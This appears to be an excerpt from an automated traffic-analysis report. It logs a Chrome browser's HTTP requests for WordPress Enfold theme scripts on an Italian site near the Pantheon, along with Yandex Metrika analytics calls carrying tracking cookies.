    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /metrika/tag.js HTTP/1.1Host: mc.yandex.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; yandexuid=5258352291735921983; yashr=2056106971735921983
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /metrika/metrika_match.html HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /watch/99162160?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr(14)clc(0-0-0)rqnt(1)aw(1)rcm(1)cdl(na)eco(42009088)fid(160)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.cipassoitalia.itSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29fid%28160%29ti%281%29 HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.cipassoitalia.itSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /sync_cookie_image_check HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
